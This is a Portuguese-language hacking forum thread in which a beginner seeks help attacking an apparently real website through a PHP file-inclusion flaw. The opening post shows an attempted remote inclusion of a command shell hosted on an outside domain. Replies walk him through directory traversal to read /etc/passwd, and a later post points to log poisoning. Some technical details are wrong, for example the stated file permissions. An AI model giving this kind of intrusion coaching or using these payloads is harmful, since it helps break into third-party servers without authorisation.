Título: Dúvida sobre File inclusion
Enviado por: rmoraes online 29 de Dezembro , 2007, 10:58:44 PM
Enviado por: rmoraes online 29 de Dezembro , 2007, 10:58:44 PM
Olá a todos ...
Estou com um problema fiz scan em um site é tem a vulnerabilidade File inclusion
porém quando eu tento injetar a CMD ocorre este erro alguém poderia me dizer o porquê
deste erro abaixo?
Porquê deste erro?
lembrando que sou inciante.
Vlw !!!
Estou com um problema fiz scan em um site é tem a vulnerabilidade File inclusion
porém quando eu tento injetar a CMD ocorre este erro alguém poderia me dizer o porquê
deste erro abaixo?
CitarWarning: include(pages/http://www.nershess.orgfree.com/darkers.txt?.php) [function.include]: failed to open stream: No such file or directory in /home/baladas2/public_html/novo/uberlandia/index.php on line 35
Warning: include() [function.include]: Failed opening 'pages/http://www.nershess.orgfree.com/darkers.txt?.php' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/baladas2/public_html/novo/uberlandia/index.php on line 35
Porquê deste erro?
lembrando que sou inciante.Vlw !!!
Título: Re: Dúvida sobre File inclusion
Enviado por: Wuefez online 31 de Dezembro , 2007, 06:43:04 PM
Enviado por: Wuefez online 31 de Dezembro , 2007, 06:43:04 PM
Seguinte pois o cara usou algo como:
Existem 2 tipos de vulnerabilidades de "File Inclusion", a primeira que no caso é a que você esta tentando se chama Remote File Inclusion (RFI), que te permite incluir arquivos externos, e a segunda é Local File Inclusion, que te permite incluir arquivos que ja estão salvos no proprio servidor.......
Ai você pensa, mas pows aonde isso me é util?
Simples você pode carregar arquivos que normalmente não teria acesso...
Vai subindo dirs e tenta chegar no passwd...
Tipo: http://exemplo.com.br/script.php?bug=.. ... etc/passwd (http://exemplo.com.br/script.php?bug=../../../etc/passwd)
Mas se o safemode tiver ligado, não vai funcionar direito esse bug, porque ai você so pode abrir arquivos que são do mesmo UID que o PHP ta usando......
./Wuefez
Código Selecionar
include "pages/".$var; //phpExistem 2 tipos de vulnerabilidades de "File Inclusion", a primeira que no caso é a que você esta tentando se chama Remote File Inclusion (RFI), que te permite incluir arquivos externos, e a segunda é Local File Inclusion, que te permite incluir arquivos que ja estão salvos no proprio servidor.......
Ai você pensa, mas pows aonde isso me é util?
Simples você pode carregar arquivos que normalmente não teria acesso...
Vai subindo dirs e tenta chegar no passwd...
Tipo: http://exemplo.com.br/script.php?bug=.. ... etc/passwd (http://exemplo.com.br/script.php?bug=../../../etc/passwd)
Mas se o safemode tiver ligado, não vai funcionar direito esse bug, porque ai você so pode abrir arquivos que são do mesmo UID que o PHP ta usando......
./Wuefez
Título: Re: Dúvida sobre File inclusion
Enviado por: branco online 31 de Dezembro , 2007, 08:01:11 PM
Enviado por: branco online 31 de Dezembro , 2007, 08:01:11 PM
tipo rmoraes...oque o wuefez disse está certo, só acrescentando
Warning: include(pages/http://www.nershess.orgfree.com/darkers.txt?.php) [function.include]: failed to open stream: No such file or directory in /home/baladas2/public_html/novo/uberlandia/index.php on line 35
ta vendo ali dentro da função include o (pages/......)
pois é, a função está tentando incluir um arquivo que está dentro da pasta pages/
ou seja, como o wuefez disse, RFI você não vai poder fazer, porém pode descer diretorios fazendo a tecnica chamada "diretorio transversal"
olhe esse erro lhe foi util /home/baladas2/public_html/novo/uberlandia/index.php
nele vc pode verificar que a pasta index está em
/home/baladas2/public_html/novo/uberlandia
lembrando que com ../ você desce um diretório
e que o arquivo de "senhas" ( que nao tem nada de util pra vc ) se encontra em /etc/passwd
então você pode calcular quantos ../ precisará fazer para chegar a esse arquivo.
lembrese ainda que depois de descer todos os diretórios, ainda terá que descer oque está na função include, no caso o "pages/"
gogo, bora estudar e ownar xD
te aconselho a estudar PHP, vai te ajudar bastante brow..
até
Warning: include(pages/http://www.nershess.orgfree.com/darkers.txt?.php) [function.include]: failed to open stream: No such file or directory in /home/baladas2/public_html/novo/uberlandia/index.php on line 35
ta vendo ali dentro da função include o (pages/......)
pois é, a função está tentando incluir um arquivo que está dentro da pasta pages/
ou seja, como o wuefez disse, RFI você não vai poder fazer, porém pode descer diretorios fazendo a tecnica chamada "diretorio transversal"
olhe esse erro lhe foi util /home/baladas2/public_html/novo/uberlandia/index.php
nele vc pode verificar que a pasta index está em
/home/baladas2/public_html/novo/uberlandia
lembrando que com ../ você desce um diretório
e que o arquivo de "senhas" ( que nao tem nada de util pra vc ) se encontra em /etc/passwd
então você pode calcular quantos ../ precisará fazer para chegar a esse arquivo.
lembrese ainda que depois de descer todos os diretórios, ainda terá que descer oque está na função include, no caso o "pages/"
gogo, bora estudar e ownar xD
te aconselho a estudar PHP, vai te ajudar bastante brow..
até
Título: Re: Dúvida sobre File inclusion
Enviado por: branco online 31 de Dezembro , 2007, 08:11:11 PM
Enviado por: branco online 31 de Dezembro , 2007, 08:11:11 PM
só corrigindo uma coisa...
eu nao uso muito linux entao nao sei direito mas creio que estou correto.
vc vai abrir os arquivos com o usuário www-data ( apache ) do servidor ( ou com o do PHP ), e o arquivo /etc/passwd tem permissão 755, isso significa que vc poderá ler ele, só não poderá sobreescreve-lo.
do mesmo modo funciona para uma CMD que roda com o www-data, ela não pode sobreescrever os arquivos que tem permissao 755.
lembrando ainda que :
r = 4
w = 2
x = 1
5 = r ( read ) + x ( execuçao )
7 = r + w + x
boa sorte, até
eu nao uso muito linux entao nao sei direito mas creio que estou correto.
vc vai abrir os arquivos com o usuário www-data ( apache ) do servidor ( ou com o do PHP ), e o arquivo /etc/passwd tem permissão 755, isso significa que vc poderá ler ele, só não poderá sobreescreve-lo.
do mesmo modo funciona para uma CMD que roda com o www-data, ela não pode sobreescrever os arquivos que tem permissao 755.
lembrando ainda que :
r = 4
w = 2
x = 1
5 = r ( read ) + x ( execuçao )
7 = r + w + x
boa sorte, até
Título: Re: Dúvida sobre File inclusion
Enviado por: Mental_Way online 01 de Janeiro , 2008, 07:08:42 PM
Enviado por: Mental_Way online 01 de Janeiro , 2008, 07:08:42 PM
hehehehhehe
Wuefez e branco dando aula de ownz...
Muito bom, e como o brnaco disse estude php que isso irá te ajudar bastante a entender como funcionam as falhas..
Sem +...
Mental_Way
Wuefez e branco dando aula de ownz...
Muito bom, e como o brnaco disse estude php que isso irá te ajudar bastante a entender como funcionam as falhas..
Sem +...
Mental_Way
Título: Re: Dúvida sobre File inclusion
Enviado por: rmoraes online 02 de Janeiro , 2008, 12:18:54 AM
Enviado por: rmoraes online 02 de Janeiro , 2008, 12:18:54 AM
Muito obrigado Branco é Wuefez por responder é tirar as duvidas
saberia por onde posso começar a estudar php algum site que possa
ajuda?
Abraços a todos
saberia por onde posso começar a estudar php algum site que possa
ajuda?
Abraços a todos
Título: Re: Dúvida sobre File inclusion
Enviado por: branco online 02 de Janeiro , 2008, 12:38:56 AM
Enviado por: branco online 02 de Janeiro , 2008, 12:38:56 AM
http://br.php.net/manual/pt_BR/ (http://br.php.net/manual/pt_BR/)
boa leitura
boa leitura
Título: Re: Dúvida sobre File inclusion
Enviado por: Cloudy online 02 de Janeiro , 2008, 11:32:31 PM
Enviado por: Cloudy online 02 de Janeiro , 2008, 11:32:31 PM
Sem contar que qualquer arquivo que você colocar no include, se tiver algum código em PHP esse código vai ser interpretado e executado.
...by Cloudy
...by Cloudy
Título: Re: Dúvida sobre File inclusion
Enviado por: Zieg online 22 de Novembro , 2009, 06:21:53 PM
Enviado por: Zieg online 22 de Novembro , 2009, 06:21:53 PM
Hm.. uma duvida
Caso eu nao tenha acesso ao \etc\shadow por causa de permissão, esse lance seria inutil ne?
Ou tem mais alguma coisa que é possivel fazer apenas podendo ler os arquivos do servidor?
Caso eu nao tenha acesso ao \etc\shadow por causa de permissão, esse lance seria inutil ne?
Ou tem mais alguma coisa que é possivel fazer apenas podendo ler os arquivos do servidor?
Título: Re: Dúvida sobre File inclusion
Enviado por: Zieg online 24 de Novembro , 2009, 02:09:03 AM
Enviado por: Zieg online 24 de Novembro , 2009, 02:09:03 AM
Opa! Podem ignorar minha pergunta =D ja descobri
o segredo ta em escrever nos logs >;D.....tanta coisa pra descobrir ainda =[
o segredo ta em escrever nos logs >;D.....tanta coisa pra descobrir ainda =[